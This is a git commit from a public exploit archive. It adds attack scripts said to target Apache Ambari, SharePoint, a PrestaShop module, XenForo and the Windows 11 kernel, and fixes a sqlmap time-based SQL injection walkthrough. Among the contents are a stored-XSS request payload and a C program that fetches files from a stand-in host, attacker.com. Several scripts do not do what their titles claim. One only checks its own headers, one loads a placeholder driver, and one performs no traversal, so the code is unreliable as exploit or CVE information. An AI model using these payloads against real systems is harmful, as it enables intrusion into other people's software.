DB: 2023-06-27

7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
2023-06-27 00:17:09 +00:00 · 2023-06-27 00:17:09 +00:00 · 7807e6f266
commit 7807e6f266
parent c79c4813de
7 changed files with 495 additions and 7 deletions
--- a/exploits/multiple/remote/51546.py
+++ b/exploits/multiple/remote/51546.py
@ -0,0 +1,39 @@
 # Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
 # Date: 2023-06-23
 # country: Iran
 # Exploit Author: Amirhossein Bahramizadeh
 # Category : Remote
 # Vendor Homepage:
 Microsoft
 Apache Ambari
 Microsoft azure Hdinsights
 # Tested on: Windows/Linux
 # CVE : CVE-2023-23408
 import requests
 # Set the URL and headers for the Ambari web interface
 url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
 headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
 # Define a function to validate the headers
 def validate_headers(headers):
    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
        return False
    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
        return False
    return True
 # Define a function to send a request to the Ambari web interface
 def send_request(url, headers):
    if not validate_headers(headers):
        print("Invalid headers")
        return
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        print("Request successful")
    else:
        print("Request failed")
 # Call the send_request function with the URL and headers
 send_request(url, headers)
--- a/exploits/multiple/webapps/51543.c
+++ b/exploits/multiple/webapps/51543.c
@ -0,0 +1,154 @@
 // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
 // Date: 2023-06-20
 // country: Iran
 // Exploit Author: Amirhossein Bahramizadeh
 // Category : Remote
 // Vendor Homepage:
 // Microsoft SharePoint Foundation 2013 Service Pack 1
 // Microsoft SharePoint Server Subscription Edition
 // Microsoft SharePoint Enterprise Server 2013 Service Pack 1
 // Microsoft SharePoint Server 2019
 // Microsoft SharePoint Enterprise Server 2016
 // Tested on: Windows/Linux
 // CVE : CVE-2023-28288
 #include <windows.h>
 #include <stdio.h>
 // The vulnerable SharePoint server URL
 const char *server_url = "http://example.com/";
 // The URL of the fake SharePoint server
 const char *fake_url = "http://attacker.com/";
 // The vulnerable SharePoint server file name
 const char *file_name = "vuln_file.aspx";
 // The fake SharePoint server file name
 const char *fake_file_name = "fake_file.aspx";
 int main()
 {
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];
    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");
    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);
    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);
    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }
    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }
    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");
    return 0;
 }
 BOOL InternetReadFileUrl(const char *url, HANDLE file)
 {
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];
    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }
    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }
    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }
    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
 }
--- a/exploits/php/webapps/51042.txt
+++ b/exploits/php/webapps/51042.txt
@ -14,13 +14,13 @@ https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-
 2. Install the NEX Forms plugin.
-3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
+3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
-4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3
+4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
 sqlmap will find a time-based blind payload:
 Parameter: form_id (GET)
    Type: time-based blind
-    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
+    Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
-    Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
+    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
--- a/exploits/php/webapps/51545.py
+++ b/exploits/php/webapps/51545.py
@ -0,0 +1,61 @@
 # Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
 # Date: 2023-06-20
 # Dork: /modules/winbizpayment/downloads/download.php
 # country: Iran
 # Exploit Author: Amirhossein Bahramizadeh
 # Category : webapps
 # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
 # Version: 17.1.3 (REQUIRED)
 # Tested on: Windows/Linux
 # CVE : CVE-2023-30198
 import requests
 import string
 import random
 # The base URL of the vulnerable site
 base_url = "http://example.com"
 # The URL of the login page
 login_url = base_url + "/authentication.php"
 # The username and password for the admin account
 username = "admin"
 password = "password123"
 # The URL of the vulnerable download.php file
 download_url = base_url + "/modules/winbizpayment/downloads/download.php"
 # The ID of the order to download
 order_id = 1234
 # The path to save the downloaded file
 file_path = "/tmp/order_%d.pdf" % order_id
 # The session cookies to use for the requests
 session_cookies = None
 # Generate a random string for the CSRF token
 csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
 # Send a POST request to the login page to authenticate as the admin user
 login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
 session = requests.Session()
 response = session.post(login_url, data=login_data)
 # Save the session cookies for future requests
 session_cookies = session.cookies.get_dict()
 # Generate a random string for the CSRF token
 csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
 # Send a POST request to the download.php file to download the order PDF
 download_data = {"id_order": order_id, "csrf_token": csrf_token}
 response = session.post(download_url, cookies=session_cookies, data=download_data)
 # Save the downloaded file to disk
 with open(file_path, "wb") as f:
    f.write(response.content)
 # Print a message indicating that the file has been downloaded
 print("File downloaded to %s" % file_path)
--- a/exploits/php/webapps/51547.txt
+++ b/exploits/php/webapps/51547.txt
@ -0,0 +1,61 @@
 # Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
 # Date: 2023-06-24
 # Exploit Author: Furkan Karaarslan
 # Category : Webapps
 # Vendor Homepage: https://x.com/admin.php?smilies
 # Version: 2.2.12 (REQUIRED)
 # Tested on: Windows/Linux
 # CVE :
 -----------------------------------------------------------------------------
 Requests
 POST /admin.php?smilie-categories/0/save HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://127.0.0.1/admin.php?smilies/
 X-Requested-With: XMLHttpRequest
 Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
 Content-Length: 1038
 Origin: http://127.0.0.1
 Connection: close
 Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
 Sec-Fetch-Dest: empty
 Sec-Fetch-Mode: cors
 Sec-Fetch-Site: same-origin
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="_xfToken"
 1687616851,83fd2350307156281e51b17e20fe575b
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="title"
 <img src=x onerror=alert(document.domain)>
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="display_order"
 1
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="_xfRequestUri"
 /admin.php?smilies/
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="_xfWithData"
 1
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="_xfToken"
 1687616849,b74724a115448b864ba2db8f89f415f5
 -----------------------------333176689514537912041638543422
 Content-Disposition: form-data; name="_xfResponseType"
 json
 -----------------------------333176689514537912041638543422--
 Response: After it is created, an alert comes immediately.
--- a/exploits/windows/local/51544.c
+++ b/exploits/windows/local/51544.c
@ -0,0 +1,168 @@
 // Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
 // Date: 2023-06-20
 // country: Iran
 // Exploit Author: Amirhossein Bahramizadeh
 // Category : webapps
 // Vendor Homepage:
 // Tested on: Windows/Linux
 // CVE : CVE-2023-28293
 #include <windows.h>
 #include <stdio.h>
 // The vulnerable driver file name
 const char *driver_name = "vuln_driver.sys";
 // The vulnerable driver device name
 const char *device_name = "\\\\.\\VulnDriver";
 // The IOCTL code to trigger the vulnerability
 #define IOCTL_VULN_CODE 0x222003
 // The buffer size for the IOCTL input/output data
 #define IOCTL_BUFFER_SIZE 0x1000
 int main()
 {
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];
    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }
    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }
    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);
    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }
    // Print the output buffer contents
    printf("Output buffer:\n%s\n", output_buffer);
    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }
    // Close the vulnerable driver device
    CloseHandle(device);
    return 0;
 }
 BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
 {
    SC_HANDLE sc_manager, service;
    DWORD error;
    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }
    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }
    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }
    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
 }
 BOOL UnloadDriver(LPCTSTR service_name)
 {
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;
    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }
    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }
    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }
    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }
    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
 }
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10650,6 +10650,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/52e3d6ad93482c97ca4ebcbb81e42f6469b29a0f/Axis%20SSI%20RCE
 16312,exploits/multiple/remote/16312.rb,"Axis2 - (Authenticated) Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,remote,multiple,,2010-12-14,2011-03-06,1,CVE-2010-0219,"Metasploit Framework (MSF)",,,,http://www.rapid7.com/security-center/advisories/R7-0037.jsp
 16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - (Authenticated) Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,remote,multiple,,2010-12-14,2016-09-21,1,CVE-2010-0219,"Metasploit Framework (MSF)",,,,http://www.rapid7.com/security-center/advisories/R7-0037.jsp
 51546,exploits/multiple/remote/51546.py,"Azure Apache Ambari 2302250400 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",remote,multiple,,2023-06-26,2023-06-26,0,CVE-2023-23408,,,,,
 20639,exploits/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,remote,multiple,,2001-02-15,2012-08-18,1,CVE-2001-0307;OSVDB-762,,,,,https://www.securityfocus.com/bid/2389/info
 23257,exploits/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",remote,multiple,,2003-10-16,2012-12-09,1,CVE-2003-1511;OSVDB-2689,,,,,https://www.securityfocus.com/bid/8841/info
 20638,exploits/multiple/remote/20638.txt,"Bajie WebServer 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,remote,multiple,,2001-02-15,2012-08-18,1,CVE-2001-0308;OSVDB-11638,,,,,https://www.securityfocus.com/bid/2388/info
@ -11945,6 +11946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18012,exploits/multiple/webapps/18012.txt,"Metasploit Web UI 4.1.0 - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",webapps,multiple,,2011-10-20,2020-08-22,1,OSVDB-80287,,,,,http://www.rul3z.de/advisories/SSCHADV2011-033.txt
 39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple,,2016-05-17,2016-05-17,0,CVE-2016-2296,"Metasploit Framework (MSF)",,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
 39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",webapps,multiple,80,2016-03-23,2016-03-23,0,,,,,,http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
 51543,exploits/multiple/webapps/51543.c,"Microsoft SharePoint Enterprise Server 2016 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",webapps,multiple,,2023-06-26,2023-06-26,0,CVE-2023-28288,,,,,
 48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,,2020-08-27,2020-08-27,0,CVE-2020-15920,,,,,
 49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 33019,exploits/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",webapps,multiple,,2014-05-03,2014-05-03,0,CVE-2014-2347;OSVDB-106557,,,,,
@ -15116,7 +15118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
-51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-35155,,,,,
+51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,,
 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@ -24301,7 +24303,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
 2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
-51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3142,,,,,
+51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,0,CVE-2022-3142,,,,,
 28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
 27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
 37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info
@ -28051,6 +28053,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
 51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,,
 49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,,2020-12-16,2020-12-16,0,,,,,,
 51545,exploits/php/webapps/51545.py,"PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory",2023-06-26,"Amirhossein Bahramizadeh",webapps,php,,2023-06-26,2023-06-26,0,CVE-2023-30198,,,,,
 15064,exploits/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",webapps,php,,2010-09-20,2010-09-20,0,CVE-2010-3483;CVE-2010-3482;OSVDB-68194;OSVDB-68154,,,,http://www.exploit-db.comprimitivecms.rar,
 27025,exploits/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injections",2006-01-03,r0t,webapps,php,,2006-01-03,2013-07-23,1,,,,,,https://www.securityfocus.com/bid/16125/info
 28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php,,2006-07-24,2013-09-13,1,,,,,,https://www.securityfocus.com/bid/19138/info
@ -30867,7 +30870,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comTraidnt_up_V3.0.zip,
 36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",webapps,php,,2015-04-13,2015-04-13,0,OSVDB-120607,,,,,
 5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46509;CVE-2008-2839;OSVDB-46508;CVE-2008-2838,,,,,
-51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3141,,,,,
+51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-3141,,,,,
 11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip,
 6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm
 8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
@ -33902,6 +33905,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5818,exploits/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,webapps,php,,2008-06-13,2016-12-07,1,OSVDB-54025;CVE-2008-6714,,,,http://www.exploit-db.comxeCMS-RC2.7z,
 4758,exploits/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,webapps,php,,2007-12-18,2016-12-07,1,OSVDB-44555;CVE-2007-6508,,,,http://www.exploit-db.comxeCMS-RC2.7z,
 39849,exploits/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",webapps,php,443,2016-05-23,2016-05-23,1,,,,,http://www.exploit-db.comXenAPI-1.4.1.tar.gz,
 51547,exploits/php/webapps/51547.txt,"Xenforo Version 2.2.13 - Authenticated Stored XSS",2023-06-26,"Furkan Karaarslan",webapps,php,,2023-06-26,2023-06-26,0,,,,,,
 8414,exploits/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,webapps,php,,2009-04-12,,1,OSVDB-53652,,,,,
 28364,exploits/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - 'profile.php' Directory Traversal",2006-08-09,"Chris Boulton",webapps,php,,2006-08-09,2013-09-18,1,CVE-2006-4161;OSVDB-27916,,,,,https://www.securityfocus.com/bid/19446/info
 28406,exploits/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",webapps,php,,2006-08-19,2013-09-20,1,CVE-2006-4279;OSVDB-28090,,,,,https://www.securityfocus.com/bid/19606/info
@ -41577,6 +41581,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,,2021-01-06,2021-01-06,0,,,,,,
 11779,exploits/windows/local/11779.pl,"Windisc 1.3 - Local Stack Buffer Overflow",2010-03-16,Rick2600,local,windows,,2010-03-15,2010-11-12,1,OSVDB-63026,,,,http://www.exploit-db.comwindiscz.exe,
 51203,exploits/windows/local/51203.txt,"Windows 11 10.0.22000 -  Backup service Privilege Escalation",2023-04-03,nu11secur1ty,local,windows,,2023-04-03,2023-04-06,0,CVE-2023-21752,,,,,
 51544,exploits/windows/local/51544.c,"Windows 11 22h2 - Kernel Privilege Elevation",2023-06-26,"Amirhossein Bahramizadeh",local,windows,,2023-06-26,2023-06-26,0,CVE-2023-28293,,,,,
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",2021-11-12,"Marcio Mendes",local,windows,,2021-11-12,2021-11-12,0,,,,,,
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,,2020-09-16,2020-09-16,0,,,,,,
